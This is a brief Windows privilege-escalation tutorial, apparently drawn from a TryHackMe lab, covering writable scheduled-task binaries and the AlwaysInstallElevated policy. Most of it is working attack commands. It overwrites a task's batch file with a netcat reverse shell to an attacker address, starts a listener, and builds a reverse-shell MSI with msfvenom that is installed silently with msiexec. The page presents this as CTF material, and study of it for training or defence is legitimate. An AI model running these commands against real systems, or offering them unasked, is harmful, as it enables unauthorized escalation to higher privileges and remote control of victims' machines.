Quick misconfiguration wins
Attack tree
1 Escalate through misconfigurations
1.1 Scheduled tasks (OR)
1.2 AlwaysInstallElevated
Examples
Scheduled tasks
List scheduled tasks:
C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: THM-PC1
TaskName: \vulntask
Task To Run: C:\tasks\schtask.bat
Run As User: taskusr1
...
The Task To Run
is of interest. If the current user can modify or overwrite the executable, we can control what
gets executed by the taskusr1
user, giving a simple privilege escalation.
Check the file permissions on the executable:
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
In this case, the BUILTIN\Users
group has full access (F) over the task’s binary. This means we can modify the
.bat
file and insert any payload.
Change the .bat
file to spawn a reverse shell:
C:\> echo c:\tools\nc64.exe -e cmd.exe <IP address attack machine> 4444 > C:\tasks\schtask.bat
And start a listener on the attack machine:
nc -lvp 4444
The next time the scheduled task runs, you should receive the reverse shell with taskusr1
privileges. Depending on
when the task is scheduled to run, this may take a looong time.
AlwaysInstallElevated
Query the registry values:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Both should be set for this exploitation to work.
Generate an evil
.msi
file usingmsfvenom
:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP address attack machine> LPORT=<port-number> -f msi -o evil.msi
Run the Metasploit Handler module configured accordingly.
Transfer the file to
C:\Windows\Temp
on the target machine.Run the installer with the command below and receive the reverse shell:
C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
Notes
These belong more to the realm of CTF events rather than real world scenarios.
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it’s using a binary you can modify.
Windows installer files (
.msi
files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. And they can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow for generating a malicious.msi
file that would run with admin privileges.